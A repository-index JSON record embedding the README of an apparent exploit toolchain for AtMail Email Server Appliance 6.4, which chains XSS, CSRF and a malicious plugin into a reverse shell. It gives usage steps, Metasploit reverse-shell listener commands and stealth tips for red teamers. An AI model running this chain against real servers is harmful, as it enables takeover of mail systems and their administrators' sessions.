{"id":18688791,"url":"https://github.com/noraj/atmail-exploit-toolchain","last_synced_at":"2025-04-12T05:38:13.849Z","repository":{"id":86821675,"uuid":"261028953","full_name":"noraj/Atmail-exploit-toolchain","owner":"noraj","description":"AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS \u003e CSRF \u003e RCE)","archived":false,"fork":false,"pushed_at":"2022-12-08T19:51:49.000Z","size":12,"stargazers_count":11,"open_issues_count":0,"forks_count":1,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-04-12T05:38:06.514Z","etag":null,"topics":["atmail","csrf","exploit","plugin","rce","reverse-shell","xss"],"latest_commit_sha":null,"homepage":"https://pwn.by/noraj/","language":"PHP","has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/noraj.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-05-03T21:59:51.000Z","updated_at":"2024-10-02T05:20:08.000Z","dependencies_parsed_at":null,"dependency_job_id":"aa46764c-13af-4568-96a8-0881ede84f90","html_url":"https://github.com/noraj/Atmail-exploit-toolchain","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FAtmail-exploit-toolchain","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FAtmail-exploit-toolchain/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FAtmail-exploit-toolchain/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/noraj%2FAtmail-exploit-toolchain/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/noraj","download_url":"https://codeload.github.com/noraj/Atmail-exploit-toolchain/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248525168,"owners_count":21118616,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["atmail","csrf","exploit","plugin","rce","reverse-shell","xss"],"created_at":"2024-11-07T10:38:24.207Z","updated_at":"2025-04-12T05:38:13.841Z","avatar_url":"https://github.com/noraj.png","language":"PHP","funding_links":[],"categories":[],"sub_categories":[],"readme":"# AtMail Email Server Appliance 6.4 - Exploit toolchain (XSS \u003e CSRF \u003e RCE)\n\n[[PacketStorm](https://packetstormsecurity.com/files/158710/AtMail-Email-Server-Appliance-6.4-XSS-CSRF-Code-Execution.html)] [[WLB-2020080010](https://cxsecurity.com/issue/WLB-2020080010)]\n\nDisclaimer: this exploit toolchain was inspired by [EDB-ID 20009][20009].\n\n## Goal\n\nThe goal of this exploit toolchain is to replace [EDB-ID 20009][20009].\n\nPros of this toolchain over [EDB-ID 20009][20009] exploit:\n\n+ Simple to use\n+ Reusable\n+ Dynamically generated payloads\n+ Easily editable / hackable\n+ Clear code and plugin available\n\nCons of [EDB-ID 20009][20009] exploit:\n\n- Not customizable (static hardcoded payloads)\n- Complex to use (need to replace many hardcoded values and adapt the code to suite the target environment)\n- Oneshot use (all values hardcoded)\n- The plugin archive tgz is embedded as string (hex chars) so the plugin source code can't be easily read or modified\n\n## Requirements\n\n- (Optional) [Metasploit Framework][msf] (`msfvenom` for reverse shell generation)\n- [tar][tar] (to generate the plugin archive)\n- [ruby][ruby] (payloads preparation and XSS SMTP delivery)\n- (Optional) A web server to deliver the XSS payload\n- Knowing an Atmail admin email address (only admins can install a plugin)\n- Passive interaction (the admin needs to trigger the email containing the XSS payload on the WebMail and to have a valid administration interface session running)\n\nInstall requirements on ArchLinux:\n\n```\n$ sudo pacman -S metasploit tar ruby\n```\n\n## How it works\n\n1. Sending an email to the admin containing a XSS payload\n2. The XSS payload remotely load the JavaScript CSRF\n3. The CSRF install a plugin\n4. When installed the plugin execute a system command: the reverse shell\n\nExploit files:\n\n- `config.yml` contains the toolchain configuration\n- `exploit.sh` the exploit wrapper that need to be executed\n- `xss_mail.rb` will send the email containing the XSS to the admin via Atmail SMTP server (unauthenticated).\n- `csrf_prepare.rb` will prepare the CSRF payload (setting the target and encoding the plugin archive)\n- `rce_prepare.rb` will prepare the RCE (generating the reverse shell and creating the plugin archive)\n- `csrf_plugin.js` the prepared CSRF payload\n- `noraj/` folder containing the uncompressed plugin architecture\n\n## Usage\n\nThe exploit toolchain requires only 2 manual steps:\n\n1. Edit `config.yml`\n2. Launch `exploit.sh`\n\nBut before launching the attack, a web server need to deliver the JavaScript CSRF file and a reverse shell listener need to be waiting the connection. So the attack will more looks like:\n\n1. Edit `config.yml`\n2. Start a HTTP server that will deliver `csrf_plugin.js`\n3. Start the reverse shell listener\n4. Launch `exploit.sh`\n\nExample of oneline HTTP server:\n\n```\n$ ruby -run -e httpd . -p 8000\n```\n\nExample of reverse shell listener:\n\n```\nmsf5 \u003e use exploit/multi/handler\nmsf5 exploit(multi/handler) \u003e set payload php/reverse_php\npayload =\u003e php/reverse_php\nmsf5 exploit(multi/handler) \u003e set LHOST 1.1.1.1\nLHOST =\u003e 1.1.1.1\nmsf5 exploit(multi/handler) \u003e set LPORT 8080\nLPORT =\u003e 8080\nmsf5 exploit(multi/handler) \u003e run\n```\n\n## Notes\n\n- The RCE occurs only when the plugin is **installed**, if the reverse shell connection is lost, re-executing means re-installing the plugin. So the admin only needs to reload his mailbox.\n- Red teamers could enhance the exploit to auto-remove the email once read and to remove the plugin once the reverse shell connection is established: less persistent but more stealth.\n- msfvenom (MSF 5.0) only supports an IP address for LHOST, not a domain.\n- As said in _Requirements_ the admin needs to be connect on both the Webmail and the administration interface.\n- Tested with ruby 2.7.\n\n[20009]:https://www.exploit-db.com/exploits/20009\n[msf]:https://github.com/rapid7/metasploit-framework\n[tar]:https://www.gnu.org/software/tar/\n[ruby]:https://www.ruby-lang.org/\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnoraj%2Fatmail-exploit-toolchain","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fnoraj%2Fatmail-exploit-toolchain","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fnoraj%2Fatmail-exploit-toolchain/lists"}